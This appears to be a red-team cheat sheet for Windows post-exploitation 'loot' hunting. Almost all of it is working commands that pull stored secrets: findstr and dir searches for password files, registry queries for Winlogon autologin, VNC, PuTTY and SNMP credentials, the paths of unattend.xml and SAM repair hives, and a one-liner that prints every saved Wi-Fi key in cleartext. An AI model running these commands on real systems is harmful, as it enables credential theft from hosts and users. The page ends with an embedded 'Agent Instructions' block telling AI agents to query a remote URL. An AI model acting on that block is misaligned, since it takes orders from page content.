# search\_4\_loot WINDOWS - SEARCH 4 LOOT Search for file contents cd C: & findstr /SI /M "password" *.xml* .ini *.txt findstr /si password* .xml *.ini* .txt *.config findstr /spin "password"* .\* Search for a file with a certain filename dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C: user.txt where /R C: \*.ini Search the registry for key names and passwords REG QUERY HKLM /F "password" /t REG\_SZ /S /K REG QUERY HKCU /F "password" /t REG\_SZ /S /K reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials reg query HKEY\_LOCAL\_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password reg query HKLM /f password /t REG\_SZ /s reg query HKCU /f password /t REG\_SZ /s Passwords in unattend.xml Location of the unattend.xml files. C:\unattend.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml Display the content of these files with dir /s *sysprep.inf* sysprep.xml *unattended.xml* unattend.xml \*unattend.txt 2>nul Other files %SYSTEMDRIVE%\pagefile.sys %WINDIR%\debug\NetSetup.log %WINDIR%\repair\sam %WINDIR%\repair\system %WINDIR%\repair\software, %WINDIR%\repair\security %WINDIR%\iis6.log %WINDIR%\system32\config\AppEvent.Evt %WINDIR%\system32\config\SecEvent.Evt %WINDIR%\system32\config\default.sav %WINDIR%\system32\config\security.sav %WINDIR%\system32\config\software.sav %WINDIR%\system32\config\system.sav %WINDIR%\system32\CCM\logs\*.log %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS\~1\Tempor\~1\Content.IE5\index.dat %WINDIR%\System32\drivers\etc\hosts dir c:*vnc.ini /s /b dir c:*ultravnc.ini /s /b Wifi passwords Find AP SSID netsh wlan show profile Get Cleartext Pass netsh wlan show profile key=clear Oneliner method to extract wifi passwords from all the access point. cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xdecaf2bad.gitbook.io/red-team-notes/04-windows/search_4_loot.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.